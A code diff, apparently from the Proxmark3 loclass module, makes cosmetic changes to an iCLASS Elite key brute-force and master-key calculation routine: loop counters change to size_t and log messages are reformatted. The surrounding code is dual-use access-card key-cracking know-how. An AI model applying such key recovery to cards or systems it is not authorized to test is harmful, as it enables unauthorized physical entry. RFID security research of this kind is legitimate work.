@@ -445,7 +445,7 @@ int bruteforceItem(loclass_dumpdata_t item, uint16_t keytable[]) {
 
     loclass_thread_arg_t args[loclass_tc];
     // init thread arguments
-    for (int i = 0; i < loclass_tc; i++) {
+    for (size_t i = 0; i < loclass_tc; i++) {
         args[i].thread_idx = i;
         args[i].numbytes_to_recover = numbytes_to_recover;
         args[i].endmask = 1 << 8 * numbytes_to_recover;
@@ -458,7 +458,7 @@ int bruteforceItem(loclass_dumpdata_t item, uint16_t keytable[]) {
 
     pthread_t threads[loclass_tc];
     // create threads
-    for (int i = 0; i < loclass_tc; i++) {
+    for (size_t i = 0; i < loclass_tc; i++) {
         int res = pthread_create(&threads[i], NULL, bf_thread, (void *)&args[i]);
         if (res) {
             PrintAndLogEx(NORMAL, "");
@@ -468,7 +468,7 @@ int bruteforceItem(loclass_dumpdata_t item, uint16_t keytable[]) {
     }
     // wait for threads to terminate:
     void *ptrs[loclass_tc];
-    for (int i = 0; i < loclass_tc; i++)
+    for (size_t i = 0; i < loclass_tc; i++)
         pthread_join(threads[i], &ptrs[i]);
 
     // was it a success?
@@ -493,7 +493,7 @@ int bruteforceItem(loclass_dumpdata_t item, uint16_t keytable[]) {
             keytable[bytes_to_recover[i]] &= 0xFF;
             keytable[bytes_to_recover[i]] |= LOCLASS_CRACKED;
         }
-        for (uint8_t i = 0; i < loclass_tc; i++) {
+        for (size_t i = 0; i < loclass_tc; i++) {
             free(ptrs[i]);
         }
     }
@@ -707,7 +707,7 @@ int calculateMasterKey(uint8_t first16bytes[], uint8_t kcus[]) {
     PrintAndLogEx(SUCCESS, "-----  " _CYAN_("High security custom key (Kcus)") " -----");
     PrintAndLogEx(SUCCESS, "Standard format  %s", sprint_hex(key64_stdformat, 8));
     PrintAndLogEx(SUCCESS, "iCLASS format    " _GREEN_("%s"), sprint_hex(key64, 8));
-    PrintAndLogEx(SUCCESS, "Key verified (" _GREEN_("ok") ")");
+    PrintAndLogEx(SUCCESS, "Key verified ( " _GREEN_("ok") " )");
     PrintAndLogEx(NORMAL, "");
     return PM3_SUCCESS;
 }
@@ -758,7 +758,7 @@ int bruteforceDump(uint8_t dump[], size_t dumpsize, uint16_t keytable[]) {
         first16bytes[i] = keytable[i] & 0xFF;
 
         if ((keytable[i] & LOCLASS_CRACKED) != LOCLASS_CRACKED) {
-            PrintAndLogEx(WARNING, "Warning: we are missing byte %d, custom key calculation will fail...", i);
+            PrintAndLogEx(WARNING, "Warning: we are missing byte " _RED_("%d") " , custom key calculation will fail...", i);
             return PM3_ESOFT;
         }
     }
@@ -849,7 +849,7 @@ static int _test_iclass_key_permutation(void) {
         return PM3_ESOFT;
     }
 
-    PrintAndLogEx(SUCCESS, "    Iclass key permutation (%s)", _GREEN_("ok"));
+    PrintAndLogEx(SUCCESS, "    Iclass key permutation ( %s )", _GREEN_("ok"));
     return PM3_SUCCESS;
 }
 
@@ -892,17 +892,17 @@ int testElite(bool slowtests) {
     hash2(k_cus, keytable);
     printarr_human_readable("---------------------- Hash2 ----------------------", keytable, sizeof(keytable));
     if (keytable[3] == 0xA1 && keytable[0x30] == 0xA3 && keytable[0x6F] == 0x95) {
-        PrintAndLogEx(SUCCESS, "    hash2 (%s)", _GREEN_("ok"));
+        PrintAndLogEx(SUCCESS, "    hash2 ( %s )", _GREEN_("ok"));
     }
 
     int res = PM3_SUCCESS;
     PrintAndLogEx(INFO, "Testing hash1...");
     res += _testHash1();
-    PrintAndLogEx((res == PM3_SUCCESS) ? SUCCESS : WARNING, "    hash1 (%s)", (res == PM3_SUCCESS) ? _GREEN_("ok") : _RED_("fail"));
+    PrintAndLogEx((res == PM3_SUCCESS) ? SUCCESS : WARNING, "    hash1 ( %s )", (res == PM3_SUCCESS) ? _GREEN_("ok") : _RED_("fail"));
 
     PrintAndLogEx(INFO, "Testing key diversification...");
     res += _test_iclass_key_permutation();
-    PrintAndLogEx((res == PM3_SUCCESS) ? SUCCESS : WARNING, "    key diversification (%s)", (res == PM3_SUCCESS) ? _GREEN_("ok") : _RED_("fail"));
+    PrintAndLogEx((res == PM3_SUCCESS) ? SUCCESS : WARNING, "    key diversification ( %s )", (res == PM3_SUCCESS) ? _GREEN_("ok") : _RED_("fail"));
 
     if (slowtests)
         res += _testBruteforce();
